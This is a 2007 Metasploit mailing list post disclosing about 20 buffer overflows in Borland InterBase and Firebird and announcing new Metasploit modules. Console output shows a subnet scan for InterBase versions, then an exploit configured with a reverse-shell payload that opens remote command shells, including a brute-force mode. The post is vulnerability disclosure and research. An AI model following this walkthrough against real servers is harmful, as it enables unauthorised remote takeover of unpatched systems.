Metasploit mailing list archives
InterBase/Firebird Fun
From: ramon at risesecurity.org (Ramon de Carvalho Valle)
Date: Fri, 05 Oct 2007 21:56:51 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

While developing an exploit module for a buffer overflow vulnerability published by TippingPoint in Borland InterBase, we decided to take a quick look into the Borland InterBase code, and unfortunately, the results were no good. We found about 20 buffer overflow vulnerabilities that affect all versions of Borland InterBase, and some of them also affect the Firebird Relational Database. All remote, trivial to exploit, stack-based buffer overflows.

We contacted both Borland/CodeGear and Firebird developers about these vulnerabilities. After failed attempts to find an email address to report security issues in their products, we tried their bug tracking systems. Borland/CodeGear asked us to send the information to their support email address, but we didn't get any further responses. Firebird developers didn't answer our reports either, but they corrected these vulnerabilities in the latest version of Firebird.

We published the advisories, exploit modules for some of these vulnerabilities, and an auxiliary scanner module for Metasploit Framework 3.

The auxiliary scanner module searches for running InterBase/Firebird instances on an address range and retrieves the version and implementation of the InterBase server from the InterBase Services Manager. This auxiliary module can be used to determine the exact target that will be used in an exploitation scenario.

msf > use auxiliary/scanner/misc/ib_service_mgr_info
msf auxiliary(ib_service_mgr_info) > set RHOSTS 192.168.213.0/24
RHOSTS => 192.168.213.0/24
msf auxiliary(ib_service_mgr_info) > run
[*] Trying 192.168.213.0
[*] Trying 192.168.213.1
[*] Trying 192.168.213.2
...
[*] Trying 192.168.213.132
IP Address: 192.168.213.132
Version of the InterBase server: WI-V6.0.1.0
Implementation of the InterBase server: InterBase/x86/Windows NT
...
[*] Trying 192.168.213.253
[*] Trying 192.168.213.254
[*] Trying 192.168.213.255
[*] Auxiliary module execution completed
msf auxiliary(ib_service_mgr_info) >

Using this information, one can select the exact target from one of our published exploit modules.

msf auxiliary(ib_service_mgr_info) > use windows/misc/ib_isc_attach_database
msf exploit(ib_isc_attach_database) > set RHOST 192.168.213.132
RHOST => 192.168.213.132
msf exploit(ib_isc_attach_database) > set LHOST 192.168.0.4
LHOST => 192.168.0.4
msf exploit(ib_isc_attach_database) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ib_isc_attach_database) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Brute Force
   1   Borland InterBase WI-V8.1.0.257
   2   Borland InterBase WI-V8.0.0.123
   3   Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80
   4   Borland InterBase WI-V7.0.1.1
   5   Borland InterBase WI-V6.5.0.28
   6   Borland InterBase WI-V6.0.1.6
   7   Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0
   8   Borland InterBase WI-V5.5.0.742
   9   Borland InterBase WI-V5.1.1.680
   10  Debug

msf exploit(ib_isc_attach_database) > set TARGET 7
TARGET => 7
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:33891)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

The brute force option assumes that ibguard/fbguard is running and tries every available target from an exploit module sequentially.

msf exploit(ib_isc_attach_database) > set TARGET 0
TARGET => 0
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Brute forcing with 10 possible targets
[*] Trying target Borland InterBase WI-V8.1.0.257...
[*] Trying target Borland InterBase WI-V8.0.0.123...
[*] Trying target Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80...
[*] Trying target Borland InterBase WI-V7.0.1.1...
[*] Trying target Borland InterBase WI-V6.5.0.28...
[*] Trying target Borland InterBase WI-V6.0.1.6...
[*] Trying target Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0...
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:33942)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

It is important to note that all Borland InterBase vulnerabilities published by us were not corrected by the vendor and are present in all (including the latest) versions of their product.

The original blog post, advisories and modules can be found on our website at http://risesecurity.org/.

Best regards,
Ramon

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHBt1TGIS0iEuhp4MRAqH9AJ9QM5N4mxxAe88uvc0YNGH5JU55kACgr4EI
xwreRuy00uurdf/3bchwKAQ=
=dV8W
-----END PGP SIGNATURE-----